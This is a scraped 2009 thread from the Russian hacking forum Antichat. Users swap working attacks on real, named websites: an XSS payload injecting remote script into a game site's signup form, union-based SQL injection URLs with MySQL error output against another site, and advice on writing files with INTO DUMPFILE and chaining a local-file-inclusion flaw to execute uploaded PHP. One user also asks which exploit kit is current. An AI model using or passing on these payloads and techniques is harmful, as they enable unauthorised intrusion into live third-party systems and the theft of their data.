Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.07.2009, 20:51
|
|
Познающий
Регистрация: 21.04.2009
Сообщений: 58
Провел на форуме:
146521
Репутация:
34
|
|
Сообщение от L I G A
после того как пытаешся зарег-тся под ником
"><script>alert("xss")</script>
скрипт проверяет его длину (от 4 до 20 символов).
если его длина не входит в рамки ограничений то выводит к примеру
ник $_POST['nick'](ему передано значение "><script>alert("xss")</script> и по этому вылазит окно.Там не стоит
htmlspecialchars()) имеет длину больше 20 символов.
>>Из кода ясно что переменная не передаеться не как POST не как GET
данные передаються методом POST
Код HTML:
<form method="POST"
>>И что получаеться это и вовсе не уязвимость ?
уязвимость но с нее в данном случае толку 0 Я вобще тут никакой сложности не вижу
Код:
http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername="><script src=http://www.site.ru/js.js></script>
прекрасно работает! 
|
|
|
27.07.2009, 18:07
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Всем здрасти...
Есть скул
При попытке проверить ее таким способом 10-1 (должна вывестить 9 новость)
Выводится 10 новость... Значит наврятли можно чего сделать, при попытке подставить ковычку это лезет:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2,3,4,5,6,7,8--' and pd.products_id = ''+union+select+1,2,3,4,5,6' at line 1
Выплеск запроса(оставил важное токо):where p.products_id = ''+union+select+1,2,3,4,5,6--' and pd.products_id = ''+union+select+1,2,3,4,5,6--' and pd.language_id = '2'
(1,2,3,4... мое, пробывал подобрать)(запрос был таким, id='+union+select+1,2,3,4,5,6--)
При заменне плюсеков на пробелы вылазиет след. ошибка:
1109 - Unknown table 'pd' in field list
(значит внедрение запроса по идее возможно)
Как тут быть? Скул в локалке. Пробывал разные комменты (--,/*, -- ) но не помогает
|
|
|
|
27.07.2009, 20:56
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Может быть int();
Или жёсткая фильтрация.
Скорее всего 2.
|
|
|
|
27.07.2009, 21:44
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от JOHNik
Я вобще тут никакой сложности не вижу
Код:
http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername="><script src=http://www.site.ru/js.js></script>
прекрасно работает! какой сложности?для тех кто в танке: я писал о том почему алерт вылазит,и предположил что данные принимаются постом.
но Пако капнул дальше и построив опрделеннный запрос опредилил что данные принимаются через REQUEST(ну или регистр глобалс).
|
|
|
|
28.07.2009, 09:08
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Ты же сохранил в /tmp/phpinfo.php
А читаешь /tmp/phpinfo |
|
|
|
28.07.2009, 09:20
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от Ctacok
Ты же сохранил в /tmp/phpinfo.php
А читаешь /tmp/phpinfo я всё правильно делал,просто описался. ты хоть сам бы по пробовал залить прежде чем писать.
|
|
|
|
28.07.2009, 11:11
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226
Репутация:
38
|
|
какая связка сплоитов щас актуальней?
|
|
|
|
28.07.2009, 12:54
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
nub-hacker
Код:
потом
пытаюсь открыть
http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--
нифига не раб. помогите плиз.
почему не работает, как раз всё прекрасно в папку tmp залилось, что можнно проверить, пройдя по твоей последней ссылке:
Код:
http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--
посмотреть сорцы страницы, CTRL+F "<?", и ты увидишь там свой "<?phpinfo();?>"
Просто сначала ты писал "читалка", а потом почему-то ждешь исполнения того, что загрузил. На самом деле через SQL-inj то, что загрузил - то просто сможешь также ПРОЧИТАТЬ.
Чтобы файло, загруженное через скулю заработало, его (файло) надо загружать в папку, доступную из веба (т.е. чтобы можно было набрать к нему путь в адресной строке браузера), но для этого необходимы 2 условия:
1. Знать полный абсолютный путь к серверу (а не просто /tmp, которая просто является фактическим тестом рабочести load_file). Папка "/tmp"Не всегда бывает доступна на запись, что часто многих начинающих сбивает с толку и они бросают такие скули.
2. Папка должна быть доступна на запись
ЗЫЖ Ну или как ты, в /tmp, но потом искать LFI, чтобы из этой /tmp проинклудить (читай - выполнить) твой phpinfo.php
Последний раз редактировалось Pashkela; 28.07.2009 в 13:08..
|
|
|
|
28.07.2009, 13:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
:O мой пост и мою скуль крутишь 
1)load_file - это чтение исходного кода файла
2)+into+DUMPFILE+'/tmp/phpinfo.php'-- что бы это использовать надо иметь тебе инклуд |
|
|
|
28.07.2009, 13:16
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Pashkela, спасибо огромное, что так подробно разяснил. буду искать путь в web.
HAXTA4OK,спс за скулю. побольше бы рутовских |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
